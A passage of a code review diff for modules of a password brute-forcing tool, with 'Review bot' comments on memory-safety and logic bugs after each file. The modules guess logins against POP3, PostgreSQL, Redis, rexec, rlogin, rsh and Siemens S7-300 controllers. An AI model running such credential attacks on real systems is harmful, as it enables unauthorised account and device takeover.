strcpy(apop_challenge, ptr);
}
free(buf);
/* send capability request */
if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Can not send the CAPABILITY request\n");
return -1;
}
buf = pop3_read_server_capacity(sock);
if (buf == NULL) {
hydra_report(stderr, "[ERROR] No answer from CAPABILITY request\n");
return -1;
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
int i;
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) {
p.disable_tls = 0;
}
}
#ifdef LIBOPENSSL
if (!p.disable_tls) {
/* check for STARTTLS, if available we may have access to more basic auth methods */
if (strstr(buf, "STLS") != NULL) {
hydra_send(sock, "STLS\r\n", strlen("STLS\r\n"), 0);
free(buf);
buf = hydra_receive_line(sock);
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
p.disable_tls = 1;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
if (!p.disable_tls) {
/* ask again capability request but in TLS mode */
if (hydra_send(sock, capa_str, strlen(capa_str), 0) < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Can not send the CAPABILITY request\n");
return -1;
}
buf = pop3_read_server_capacity(sock);
if (buf == NULL) {
hydra_report(stderr, "[ERROR] No answer from CAPABILITY request\n");
return -1;
}
}
}
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
}
#endif
if (hydra_send(sock, quit_str, strlen(quit_str), 0) < 0) {
//we dont care if the server is not receiving the quit msg
}
hydra_disconnect(sock);
if (verbose)
hydra_report(stderr, "[VERBOSE] CAPABILITY: %s", buf);
/* example:
+OK Capability list follows:
TOP
LOGIN-DELAY 180
UIDL
USER
SASL PLAIN LOGIN
*/
/* according to rfc 2449:
The POP3 AUTH command [POP-AUTH] permits the use of [SASL]
authentication mechanisms with POP3. The SASL capability
indicates that the AUTH command is available and that it supports
an optional base64 encoded second argument for an initial client
response as described in the SASL specification. The argument to
the SASL capability is a space separated list of SASL mechanisms
which are supported.
*/
/* which mean threre will *always* have a space before the LOGIN auth keyword */
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "NTLM") != NULL)) {
p.pop3_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "DIGEST-MD5") != NULL)) {
p.pop3_auth_mechanism = AUTH_DIGESTMD5;
}
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-SHA256") != NULL)) {
p.pop3_auth_mechanism = AUTH_CRAMSHA256;
}
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-SHA1") != NULL)) {
p.pop3_auth_mechanism = AUTH_CRAMSHA1;
}
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "CRAM-MD5") != NULL)) {
p.pop3_auth_mechanism = AUTH_CRAMMD5;
}
#endif
if ((strstr(buf, " LOGIN") == NULL) && (strstr(buf, "PLAIN") != NULL)) {
p.pop3_auth_mechanism = AUTH_PLAIN;
}
if (strstr(buf, " LOGIN") != NULL) {
p.pop3_auth_mechanism = AUTH_LOGIN;
}
if (strstr(buf, "SASL") == NULL) {
#ifdef LIBOPENSSL
if (strlen(apop_challenge) == 0) {
p.pop3_auth_mechanism = AUTH_CLEAR;
} else {
p.pop3_auth_mechanism = AUTH_APOP;
}
#else
p.pop3_auth_mechanism = AUTH_CLEAR;
#endif
}
free(buf);
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
if (strstr(miscptr, "CLEAR"))
p.pop3_auth_mechanism = AUTH_CLEAR;
if (strstr(miscptr, "LOGIN"))
p.pop3_auth_mechanism = AUTH_LOGIN;
if (strstr(miscptr, "PLAIN"))
p.pop3_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strstr(miscptr, "APOP"))
p.pop3_auth_mechanism = AUTH_APOP;
if (strstr(miscptr, "CRAM-MD5"))
p.pop3_auth_mechanism = AUTH_CRAMMD5;
if (strstr(miscptr, "CRAM-SHA1"))
p.pop3_auth_mechanism = AUTH_CRAMSHA1;
if (strstr(miscptr, "CRAM-SHA256"))
p.pop3_auth_mechanism = AUTH_CRAMSHA256;
if (strstr(miscptr, "DIGEST-MD5"))
p.pop3_auth_mechanism = AUTH_DIGESTMD5;
#endif
if (strstr(miscptr, "NTLM"))
p.pop3_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (p.pop3_auth_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using POP3 CLEAR LOGIN mechanism\n");
break;
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using POP3 LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using POP3 PLAIN AUTH mechanism\n");
break;
case AUTH_APOP:
#ifdef LIBOPENSSL
if (strlen(apop_challenge) == 0) {
hydra_report(stderr, "[VERBOSE] APOP not supported by server, using clear login\n");
p.pop3_auth_mechanism = AUTH_CLEAR;
} else {
hydra_report(stderr, "[VERBOSE] using POP3 APOP AUTH mechanism\n");
}
#else
p.pop3_auth_mechanism = AUTH_CLEAR;
#endif
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using POP3 CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[VERBOSE] using POP3 CRAM-SHA1 AUTH mechanism\n");
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[VERBOSE] using POP3 CRAM-SHA256 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using POP3 DIGEST-MD5 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using POP3 NTLM AUTH mechanism\n");
break;
}
}
if (!plist)
plist = list_create(p);
else
plist = list_insert(p);
return 0;
}
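
Review bot: `strcpy(apop_challenge, ptr)` in the greeting handling of both `service_pop3()` and `service_pop3_init()` copies everything from the first `<` of the server banner into the fixed `char apop_challenge[300]` with no length check, so the remote end decides how many bytes are written to a file-scope array; bound the copy, for example `snprintf(apop_challenge, sizeof(apop_challenge), "%s", ptr)`. The same unbounded pattern appears in `start_pop3()` with `strcpy(buffer2, login)`, `strcpy(buffer2, pass)` and `sprintf(buffer, "APOP %s %s\r\n", login, buffer2)` into 500-byte arrays. Smaller points in this hunk: `sprintf(buffer, "%.250s\r\n", buffer)` uses one array as both source and destination, which is undefined behaviour; `if (buffer2 == NULL)` after `sasl_digest_md5()` tests an array and can never be true; `buf[0]` is read after the `STLS` request without a NULL check and `buf` is not freed on the failure branch; `list_insert()` dereferences the result of `list_create()` unchecked and its `plist = newnode->next;` assigns `plist` to itself.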

133
hydra-postgres.c Normal file

@ -0,0 +1,133 @@
/*
* PostgresSQL Support - by Diaul (at) devilopers.org
*
*
* 110425 no obvious memleaks found
*/
#include "hydra-mod.h"
#ifndef LIBPOSTGRES
void dummy_postgres() {
printf("\n");
}
#else
#include "libpq-fe.h" // Postgres connection functions
#include <stdio.h>
#define DEFAULT_DB "template1"
extern char *HYDRA_EXIT;
int start_postgres(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char database[256];
char connection_string[1024];
PGconn *pgconn;
if (miscptr)
strncpy(database, miscptr, sizeof(database));
else
strncpy(database, DEFAULT_DB, sizeof(database));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
/*
* Building the connection string
*/
snprintf(connection_string, sizeof(connection_string), "host = '%s' dbname = '%s' user = '%s' password = '%s' ", hydra_address2string(ip), database, login, pass);
if (verbose)
hydra_report(stderr, "connection string: %s\n", connection_string);
pgconn = PQconnectdb(connection_string);
if (PQstatus(pgconn) == CONNECTION_OK) {
PQfinish(pgconn);
hydra_report_found_host(port, ip, "postgres", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
} else {
PQfinish(pgconn);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
}
return 1;
}
void service_postgres(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_POSTGRES, mysslport = PORT_POSTGRES_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_postgres(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_postgres_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
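
Review bot: `strncpy(database, miscptr, sizeof(database))` in `start_postgres()` leaves `database` without a terminating NUL when the module option is 256 bytes or longer, and the array is then read by `snprintf` through `%s`; copy at most `sizeof(database) - 1` bytes and terminate explicitly. The connection string also places `login` and `pass` inside single quotes without escaping, so a candidate containing `'` or `\` changes how the string is parsed instead of being tested as written, and it carries no `port` keyword, so the `port` argument only affects the `hydra_connect_tcp()`/`hydra_connect_ssl()` socket that `PQconnectdb()` never uses. With `verbose` set, the full string including the password is written to stderr.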

3210
hydra-rdp.c Normal file

File diff suppressed because it is too large

103
hydra-redis.c Normal file

@ -0,0 +1,103 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_redis(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *pass, buffer[510];
char *empty = "";
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "AUTH %.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf[0] == '+') {
hydra_report_found_host(port, ip, "redis", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
if (verbose > 1)
hydra_report(stderr, "[VERBOSE] Authentication failed for password %s\n", pass);
hydra_completed_pair();
free(buf);
return 1;
}
void service_redis_core(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, int tls) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_REDIS, mysslport = PORT_REDIS_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
hydra_child_exit(0);
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
usleep(250);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_redis(sock, ip, port, options, miscptr, fp);
break;
case 3: /* error exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
void service_redis(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_redis_core(ip, sp, options, miscptr, fp, port, 0);
}
int service_redis_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
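
Review bot: in `start_redis()` the result of `hydra_receive_line(s)` is dereferenced as `buf[0]` with no NULL check, although the other modules in this commit treat NULL as a possible return; handle `buf == NULL` with an error return before looking at the first byte. The failure path also returns 1 without the `hydra_get_next_pair()` / `HYDRA_EXIT` test that the success path performs. In `service_redis_core()` the `tls` parameter is unused, `case 3` is commented as the error exit and calls `hydra_child_exit(2)` although `start_redis()` returns 3 when the pair list is exhausted, and neither `case 3` nor `case 4` has a `break` or `return` after `hydra_child_exit()`.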

110
hydra-rexec.c Normal file

@ -0,0 +1,110 @@
#include "hydra-mod.h"
// no memleaks found on 110425
#define COMMAND "/bin/ls /"
extern char *HYDRA_EXIT;
char *buf;
int start_rexec(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[300] = "", buffer2[100], *bptr = buffer2;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(buffer2, 0, sizeof(buffer2));
bptr++;
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, pass);
bptr += 1 + strlen(pass);
strcpy(bptr, COMMAND);
if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(pass) + strlen(COMMAND), 0) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret > 0 && buffer[0] == 0) {
hydra_report_found_host(port, ip, "rexec", fp);
hydra_completed_pair_found();
} else
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_rexec(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_REXEC, mysslport = PORT_REXEC_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_rexec(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_rexec_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
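
Review bot: `start_rexec()` assembles the request in `buffer2[100]` with three unbounded `strcpy` calls (`login`, `pass`, `COMMAND`), so any pair where `strlen(login) + strlen(pass)` exceeds 87 writes past the end of the stack array; size the buffer from the inputs or skip over-long candidates before copying. The `switch` in `service_rexec()` also sets `next_run = 0` on every pass, and `default` exits with status 0 after printing an error, so an unexpected return code is indistinguishable from a clean exit to the parent.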

149
hydra-rlogin.c Normal file

@ -0,0 +1,149 @@
#include "hydra-mod.h"
/*
RFC 1258
client have to use port from 512 -> 1023 or server is denying the connection
no memleaks found on 110425
*/
#define TERM "vt100/9600"
extern char *HYDRA_EXIT;
char *buf;
int start_rlogin(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[300] = "", buffer2[100], *bptr = buffer2;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(buffer2, 0, sizeof(buffer2));
bptr++;
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, TERM);
if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(TERM), 0) < 0) {
return 4;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
/* 0x00 is sent but hydra_recv transformed it */
if (strlen(buffer) == 0)
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret > 0 && (strstr(buffer, "rlogind:") != NULL))
return 1;
if (ret > 0 && (strstr(buffer, "ssword") != NULL)) {
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer2, "%s\r", pass);
if (hydra_send(s, buffer2, 1 + strlen(pass), 0) < 0) {
return 1;
}
memset(buffer, 0, sizeof(buffer));
ret = hydra_recv(s, buffer, sizeof(buffer));
if (strcmp(buffer, "\r\n"))
ret = hydra_recv(s, buffer, sizeof(buffer));
}
/* Authentication failure */
if (ret > 0 && (strstr(buffer, "ssword") == NULL)) {
#ifdef HAVE_PCRE
if (!hydra_string_match(buffer, "\\s(failure|incorrect|denied)")) {
#else
/* check for failure and incorrect msg */
if ((strstr(buffer, "ailure") == NULL) && (strstr(buffer, "ncorrect") == NULL) && (strstr(buffer, "denied") == NULL)) {
#endif
hydra_report_found_host(port, ip, "rlogin", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
} else {
/* if password is asked a second time, it means the pass we provided is wrong */
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_rlogin(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_RLOGIN, mysslport = PORT_RLOGIN_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
/* 512 -> 1023 */
hydra_set_srcport(1023);
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_rlogin(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_rlogin_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
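
Review bot: `start_rlogin()` returns 4 when the first `hydra_send()` fails, but the `switch` in `service_rlogin()` has no `case 4`, so a send error lands in `default`, is reported as an unknown return code and exits with status 0; add the case or return a code the loop handles. The request is also assembled in `buffer2[100]` with unbounded `strcpy` (login twice plus `TERM`), which overflows for a login longer than 43 bytes, and `sprintf(buffer2, "%s\r", pass)` has the same problem for a password of 99 bytes or more. `hydra_get_next_password()` is called a second time inside the `"ssword"` branch although `pass` was already fetched at the top of the function.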

122
hydra-rsh.c Normal file

@ -0,0 +1,122 @@
#include "hydra-mod.h"
#define COMMAND "/bin/ls /"
/*
password is not used here, just try to find rsh accounts
you should use -p ''
no memleaks found on 110425
*/
extern char *HYDRA_EXIT;
char *buf;
int start_rsh(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, buffer[300] = "", buffer2[100], *bptr = buffer2;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
memset(buffer2, 0, sizeof(buffer2));
bptr++;
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, login);
bptr += 1 + strlen(login);
strcpy(bptr, COMMAND);
if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(COMMAND), 0) < 0) {
return 4;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
/* 0x00 is sent but hydra_recv transformed it */
if (strlen(buffer) == 0)
ret = hydra_recv(s, buffer, sizeof(buffer));
#ifdef HAVE_PCRE
if (ret > 0 && (!hydra_string_match(buffer, "\\s(failure|incorrect|denied)"))) {
#else
if (ret > 0 && (strstr(buffer, "ailure") == NULL) && (strstr(buffer, "ncorrect") == NULL) && (strstr(buffer, "denied") == NULL)) {
#endif
hydra_report_found_host(port, ip, "rsh", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_rsh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_RSH, mysslport = PORT_RSH_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
hydra_set_srcport(1023);
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_rsh(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_rsh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
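
Review bot: the success test in `start_rsh()` reports a valid account for any non-empty reply that lacks "failure", "incorrect" or "denied", so an unrelated error string from the server counts as a hit; require a positive indicator (for example recognisable output of `COMMAND`) instead of the absence of three words. The function also returns 4 on a failed `hydra_send()` while `service_rsh()` has no `case 4`, and it builds the request in `buffer2[100]` with unbounded `strcpy` (login twice plus `COMMAND`), which overflows for a login longer than 43 bytes.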

303
hydra-s7-300.c Normal file

@ -0,0 +1,303 @@
// submitted by Alexander Timorin <ATimorin@ptsecurity.com> and Sergey Gordeychik
#include "hydra-mod.h"
#define S7PASSLEN 8
extern char *HYDRA_EXIT;
unsigned char p_cotp[] =
"\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x17"
"\x00\xc1\x02\x01\x00\xc2\x02\x01\x02\xc0"
"\x01\x0a";
unsigned char p_s7_negotiate_pdu[] =
"\x03\x00\x00\x19\x02\xf0\x80\x32\x01\x00"
"\x00\x02\x00\x00\x08\x00\x00\xf0\x00\x00"
"\x01\x00\x01\x01\xe0";
unsigned char p_s7_read_szl[] =
"\x03\x00\x00\x21\x02\xf0\x80\x32\x07\x00"
"\x00\x03\x00\x00\x08\x00\x08\x00\x01\x12"
"\x04\x11\x44\x01\x00\xff\x09\x00\x04\x01"
"\x32\x00\x04";
unsigned char p_s7_password_request[] =
"\x03\x00\x00\x25\x02\xf0\x80\x32\x07\x00"
"\x00\x00\x00\x00\x08\x00\x0c\x00\x01\x12"
"\x04\x11\x45\x01\x00\xff\x09\x00\x08";
int start_s7_300(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass, buffer[1024];
char context[S7PASSLEN + 1];
unsigned char encoded_password[S7PASSLEN];
char *spaces = " ";
int ret = -1;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
// prepare password
memset(context, 0, sizeof(context));
if (strlen(pass) < S7PASSLEN) {
strncpy(context, pass, strlen(pass));
strncat(context, spaces, S7PASSLEN - strlen(pass) );
} else {
strncpy(context, pass, S7PASSLEN);
}
// encode password
encoded_password[0] = context[0] ^ 0x55;
encoded_password[1] = context[1] ^ 0x55;
int i;
for (i = 2; i < S7PASSLEN; i++) {
encoded_password[i] = context[i] ^ encoded_password[i-2] ^ 0x55 ;
}
// send p_cotp and check first 2 bytes of answer
if (hydra_send(s, (char *) p_cotp, 22, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) )
return 3;
// send p_s7_negotiate_pdu and check first 2 bytes of answer
if (hydra_send(s, (char *) p_s7_negotiate_pdu, 25, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) )
return 3;
// send p_s7_read_szl and check first 2 bytes of answer
if (hydra_send(s, (char *) p_s7_read_szl, 33, 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) )
return 3;
// so now add encoded_password to p_s7_password_request and send
memset(buffer, 0, sizeof(buffer));
memcpy(buffer, p_s7_password_request, 29);
memcpy(buffer + 29, encoded_password, S7PASSLEN);
if (hydra_send(s, buffer, 29 + S7PASSLEN , 0) < 0)
return 1;
memset(buffer, 0, sizeof(buffer));
ret=hydra_recv_nb(s, buffer, sizeof(buffer));
if (ret <= 0)
return 3;
// now check answer
// 0x0000 - valid password
// 0xd605 - no password
// 0xd602 - wrong password
if (ret > 30 ) {
if (buffer[27] == '\x00' && buffer[28] == '\x00') {
hydra_report_found_host(port, ip, "s7-300", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
if (buffer[27] == '\xd6' && buffer[28] == '\x05') {
//hydra_report_found_host(port, ip, "s7-300", fp);
hydra_completed_pair_found();
hydra_report(stderr, "[INFO] No password protection enabled\n");
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
}
void service_s7_300(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int s7port = PORT_S7_300;
if (port != 0)
s7port = port;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
sock = hydra_connect_tcp(ip, s7port);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = start_s7_300(sock, ip, s7port, options, miscptr, fp);
sock = hydra_disconnect(sock);
break;
case 2: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_s7_300_init(char *ip, int sp, unsigned char options, char *miscptr, FILE *fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// 1 skip target without generating an error
// 2 skip target because of protocol problems
// 3 skip target because its unreachable
int sock = -1;
int s7port = PORT_S7_300;
char *empty = "";
char *pass, buffer[1024];
char context[S7PASSLEN + 1];
